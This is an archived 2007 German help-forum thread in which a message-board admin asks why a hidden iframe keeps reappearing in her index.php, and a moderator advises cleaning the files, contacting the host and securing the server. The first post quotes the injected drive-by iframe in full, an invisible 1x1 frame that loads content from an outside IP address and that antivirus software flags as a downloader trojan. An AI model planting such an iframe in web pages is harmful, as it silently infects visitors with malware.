Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Was ist das?

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 10.06.2007, 11:09   #1
Bea
 
Was ist das? - Standard

Was ist das?



Hallo
Bin neu hier und habe euch durchzufall gefunden..ich hoffe bin hier richtig mit dem was ich poste

Also es geht um Folgendes...Ich habe ein Board das wbb2.3.6 und seit ei igen tagen stimmt da was nicht...in der index.php schleicht sich immer dieses ein <iframe src='http://81.95.149.28/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe> .. und von da an wird bei meinen Mitgliedern der Virenalarm ausgelöst..

Ich habe meinen Kompletten PC gescannt mit antivirus..Trojanercheck gemacht ...adaware laufen lassen...aber nichts weisst auf einen Virus hin...ich hoffe ihr könnt mir helfen ..

Liebe GRüsse Bea

Alt 10.06.2007, 11:30   #2
Yopie
Moderator, a.D.
 
Was ist das? - Standard

Was ist das?



Kannst du spanisch?
Foro dev-postnuke.com :: Posible fallo de seguridad AYUDA!! :: Dev-Postnuke.com :: Comunidad hispana PHP-Postnuke - In Postnuke We Trust

Ich würde mal den Hoster kontaktieren.

Siehe auch:
Server bei 1&1 gehackt ? - Joomla CMS Support Forum
http://www.network-secure.de/index.p...=4872&Itemid=1

Gruß
Yopie
__________________


Alt 10.06.2007, 11:49   #3
Bea
 
Was ist das? - Standard

Was ist das?



Hmmm und was kann ich jetzt dagegen machen?? Ich habe dem besitzer des servers bescheid gegeben und er meint das würde nur in meinem Board so sein...was ich nicht verstehe..

Bei den Mitgliedern wird dieses als Virenmeldung angezeigt

TR/Dldr.Stration.gen
Tr/Dldr.Agent.HQ.3

ich hab komischerweise keine Virenmeldung..
__________________

Alt 10.06.2007, 11:58   #4
Yopie
Moderator, a.D.
 
Was ist das? - Standard

Was ist das?



Zitat:
Zitat von Bea Beitrag anzeigen
Hmmm und was kann ich jetzt dagegen machen?
Die php-Dateien untersuchen und dort die Einträge entfernen.

Virus gefunden - xt:Commerce Webshop Software Europe

Ob du oder der Serverbetreiber für die Sicherheitslücke verantwortlich ist kann ich nicht beurteilen.

Gruß
Yopie

Geändert von Yopie (10.06.2007 um 12:05 Uhr)

Alt 10.06.2007, 12:01   #5
Bea
 
Was ist das? - Standard

Was ist das?



das haben wir schon gemacht...nur leider ist es nach wenigen stunden wieder da...


Alt 10.06.2007, 12:11   #6
Yopie
Moderator, a.D.
 
Was ist das? - Standard

Was ist das?



Zitat:
Zitat von Bea Beitrag anzeigen
das haben wir schon gemacht...nur leider ist es nach wenigen stunden wieder da...
Dann ist der Server bzw. deine Konfiguration nicht sicher.

Also: Entweder professionelle Hilfe besorgen, oder Server bzw. deine Seiten vom Netz nehmen.

Gruß
Yopie

Geändert von Yopie (10.06.2007 um 12:17 Uhr)

Alt 10.06.2007, 12:22   #7
Bea
 
Was ist das? - Standard

Was ist das?



ok danke...

Alt 10.06.2007, 12:24   #8
Bea
 
Was ist das? - Standard

Was ist das?



Jetzt möchte ich doch nochmal was wissen..

Also ich habe das Board übernommen und aus meinem Board die einträge kopiert und eingesetzt..kann ich mir da den Virus eingepackt haben??

ich habe mein Style hochgeladen und es reingemacht...kann da ein Virus drin sein? Weil man mir sagt sowas würde nicht gehen..

Sonst habe ich da keine Veränderungen gemacht...denn der Besitzer macht mich jetzt dafür verantwortlich..

Alt 10.06.2007, 12:50   #9
Yopie
Moderator, a.D.
 
Was ist das? - Standard

Was ist das?



Keine Ahnung.

Mein Tip an dich wäre, mal bei anderen betroffenen nachzufragen, über welche Sicherheitslücke die Dateien geändert wurden.

Gruß
Yopie

Alt 19.06.2007, 19:04   #10
Yopie
Moderator, a.D.
 
Was ist das? - Standard

Was ist das?



Vielleicht passt diese SpOn-Meldung zum Problem?

Hack-Attack: Trojaner infiziert über 11.000 Webseiten - Netzwelt - SPIEGEL ONLINE - Nachrichten

Und Heise

Gruß
Yopie

Geändert von Yopie (19.06.2007 um 19:18 Uhr)

Antwort

Themen zu Was ist das?
alarm, board, folge, gefunde, gescannt, hidden, hoffe, iframe, index.php, komplette, kompletten, laufe, laufen, mitglieder, mitgliedern, neu, nichts, poste, richtig, style, tagen, virenalarm



Zum Thema Was ist das? - Hallo Bin neu hier und habe euch durchzufall gefunden..ich hoffe bin hier richtig mit dem was ich poste Also es geht um Folgendes...Ich habe ein Board das wbb2.3.6 und seit - Was ist das?...
Archiv
Du betrachtest: Was ist das? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.